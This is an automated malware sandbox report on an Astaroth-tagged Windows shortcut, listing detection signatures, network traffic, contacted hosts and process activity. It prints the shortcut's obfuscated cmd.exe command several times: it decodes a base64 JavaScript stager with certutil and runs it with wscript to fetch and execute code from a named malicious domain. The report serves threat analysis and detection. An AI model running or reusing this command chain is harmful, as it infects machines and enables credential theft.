Windows Analysis Report
Pyo37mDzQ2.lnk

Overview

General Information

Sample Name: Pyo37mDzQ2.lnk
Analysis ID: 795108
MD5: d52ac7755bd61b035235df79fabe1b59
SHA1: 4e7a57f7c7fc8ee15cb390337983d116220c7625
SHA256: f3c3d2fae15f05589f8860df40d0533165484fb2975b2204c2f7cca750eb7b51
Tags: AstarothBRAgeoGuildmalnk
Infos:

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Snort IDS alert for network traffic
Obfuscated command line found
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Source: unknown HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.6:49712 version: TLS 1.2

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 104.21.40.83 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Domain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exe Domain query: niua9f.tabcoperoo.sbs
Source: C:\Windows\System32\wscript.exe Network Connect: 104.16.123.96 443 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.6:49711 -> 104.21.40.83:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global traffic HTTP traffic detected: GET /?1/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: niua9f.tabcoperoo.sbsConnection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.16.123.96 104.16.123.96
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 31 Jan 2023 11:59:15 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSSet-Cookie: __cf_bm=BIs2LD8_lhYDyYXTr0ymbzT_KjzhpIsN6DuljoTCxPg-1675166355-0-AV0FRZbQ/YWpHBGdw9CVjNw7G3I271nQZwq5VNc0+DtOmaDFBWm4yRe3SpBDVzanTI+rvMZJJ+XxqLF7XCOqemeSvMWAAipIG/oYn2fhIk83; path=/; expires=Tue, 31-Jan-23 12:29:15 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=NoneServer-Timing: cf-q-config;dur=8.000002708286e-06Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hNqoFO77GrxC4JG2BDzytZSNLUsdJe6l4oWIHVR1%2FQiLT3nU62Aje%2BDZd%2FXg0%2BSlGBRK9IsQhcIJX3XRAcR%2F08liOBCIEl%2ByvnWfusySEzWgAXvDKFweB1o508oh0bj7gDofBA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGmzFHzmddKWhKi; SameSite=None; Secure; path=/; expires=Wed, 01-Feb-23 10:59:15 GMT; HttpOnlyServer: cloudflareCF-RAY: 792247b819f291f3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: wscript.exe, 00000003.00000003.253451427.0000021060705000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: hTtP://niua9f.tabcoperoo.sbs/?1/
Source: wscript.exe, 00000003.00000003.253408697.00000210607A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248160964.00000210607A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254191636.00000210607A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://niua9f.tabcoperoo.sbs/
Source: wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060705000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://niua9f.tabcoperoo.sbs/?1/
Source: wscript.exe, 00000003.00000002.254076024.0000021060728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253581606.0000021060728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comp
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/
Source: wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/M
Source: wscript.exe, 00000003.00000003.253581606.0000021060783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error
Source: wscript.exe, 00000003.00000003.248214429.0000021060783000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorP%
Source: wscript.exe, 00000003.00000003.248214429.0000021060761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errore.com/U
Source: unknown DNS traffic detected: queries for: niua9f.tabcoperoo.sbs
Source: global traffic HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global traffic HTTP traffic detected: GET /?1/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: niua9f.tabcoperoo.sbsConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: C:\Windows\System32\certutil.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS" Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: classification engine Classification label: mal68.evad.winLNK@6/1@2/2
Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior

Data Obfuscation
barindex
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: wscript.exe, 00000003.00000002.254076024.0000021060728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253581606.0000021060728000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW/
Source: wscript.exe, 00000003.00000003.253581606.000002106078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254076024.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.253451427.0000021060745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.254076024.000002106078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.248214429.000002106078D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 104.21.40.83 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Domain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exe Domain query: niua9f.tabcoperoo.sbs
Source: C:\Windows\System32\wscript.exe Network Connect: 104.16.123.96 443 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c:\9cea9ja\>nul 2>&1 &&s^et seeh=c:\9cea9ja\^9cea9ja.^js&&echo dmfyienms3i9innjiisicii7rgzlcj0iaxaikyj0omgio0vms3i9ilqikyj0ucirijoio0dlde9iamvjdchdzktyk0rms3irrwzlcisily9uaxvhowyudgfiy29wzxjvby5zynmvpzeviik7>!seeh!&&certutil -f -deco^de !seeh! !seeh!&&ca^ll !seeh!
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 795108 Sample: Pyo37mDzQ2.lnk Startdate: 31/01/2023 Architecture: WINDOWS Score: 68 18 Snort IDS alert for network traffic 2->18 20 Windows shortcut file (LNK) starts blacklisted processes 2->20 22 Obfuscated command line found 2->22 6 cmd.exe 3 4 2->6         started        process3 process4 8 wscript.exe 12 6->8         started        12 certutil.exe 3 2 6->12         started        dnsIp5 14 niua9f.tabcoperoo.sbs 104.21.40.83, 49711, 80 CLOUDFLARENETUS United States 8->14 16 www.cloudflare.com 104.16.123.96, 443, 49712 CLOUDFLARENETUS United States 8->16 24 System process connects to network (likely due to code injection or exploit) 8->24 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.40.83
 niua9f.tabcoperoo.sbs United States
13335 CLOUDFLARENETUS true
104.16.123.96
 www.cloudflare.com United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
www.cloudflare.com 104.16.123.96 true
niua9f.tabcoperoo.sbs 104.21.40.83 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://niua9f.tabcoperoo.sbs/?1/ true
    		unknown
    https://www.cloudflare.com/cdn-cgi/error false
      		high